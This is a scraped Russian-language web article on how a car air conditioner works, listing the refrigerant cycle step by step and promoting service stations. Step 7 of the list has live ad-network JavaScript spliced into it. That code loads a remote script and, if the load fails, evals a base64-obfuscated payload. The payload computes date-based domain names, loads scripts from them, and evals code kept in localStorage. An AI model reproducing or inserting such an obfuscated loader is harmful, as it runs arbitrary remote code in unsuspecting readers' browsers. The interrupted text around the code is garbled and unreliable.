Как работает кондиционер в авто

Кондиционер в машине – это важная составляющая любого транспортного средства. Устройство предназначено для охлаждения воздуха внутри салона автомобиля. Формирования приятного микроклимата в машине во время сильной жарки и летних душных дней. В том числе, прибор применяется для устранения вредных веществ и газов, которые находятся на дороге во время движения. Например, на автомагистралях, шоссе и многополосных дорогах количество газов такого, что может существенно подпортить здоровье человеку. Таким образом, следить за правильной работой кондиционера надо как самостоятельно, так и отправлять машину на станции технического обслуживания, чтобы мастера проверяли правильность функционирования и корректной работы устройства.

Важным фактором в корректной работе системы кондиционирования стала заправка. Процесс, который будет напрямую влиять на функционирование системы. Заправка авто кондиционеров ценасегодня не такая большая, поэтому тянуть с вопросом заправки машины точно не стоит. Это возможность грамотно обеспечить правильную работоспособность устройства на длительное время. Поэтому тянуть с заправкой точно не стоит. Иначе это приведет к существенным проблемам в дальнейшем. Вплоть до выхода из строя системы кондиционера и существенным денежным тратам.

Принцип работы

Функционирование кондиционера в машине напрямую зависит от правильности эксплуатации системы, также мастеров, которые заправляли, диагностировали и проверяли корректную работу устройства. Напомним, что профессиональные сотрудники работают в https://genstar.ua/, где быстро выполнят диагностику как отдельно взятого кондиционера, так и всей машины.

Принцип работы автомобильного кондиционера имеет следующие особенности:

1. Конструктивные элементы соединены в единый контур замкнутого типа – соединение происходит с помощью магистралей;

2. Одна магистраль применяется для передвижения фреона под низким давлением;

3. Вторая магистраль используется для прохождения фреона под высоким давлением;

4. Компрессор устройства начинает работу благодаря двигателю;

5. Внутри компрессора, где находится фреон в виде газа, происходит сжатие – это приводит к повышению температуры и росту показателя давления;

6. Магистраль, которая используется для высокого давления, дает фреону двигаться к конденсатору, что тот успешно делает;

7. Хладагент в горячем виде поступает в конденсатор; var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

8. При достижении хладагента конденсатора, происходит резкий спад температуры – идет охлаждение;

9. Хладагент конденсируется и переводится в жидкое состояние;

10. Жидкий хладагент поступает на управляющий клапан – это необходимо для регулировки подачи хладагента в испаритель;

11. В испарители проводится температурная регулировка до необходимого уровня;

12. При поступлении большего количества фреона в испаритель, происходит больший отвод тепла из салона транспортного средства;

13. Фреон постепенно испаряется – происходит это в виде газа холодного типа;

14. Задействуется магистраль для низкого давления, чтобы снова фреону перейти в компрессор;

15. Цикл повторяется снова и снова.

Таким образом, происходит постоянное движение, что ведет к состоянию, когда в салоне транспортного средства водителю и пассажирам находиться комфортно и приятно. Воздух в салоне чистый, прохладный, без примесей, вредных веществ и запахов дороги.

Своевременно посещайте СТО для проверки и заправки кондиционера машины! (adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/kak-rabotaet-konditsioner-v-avto/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top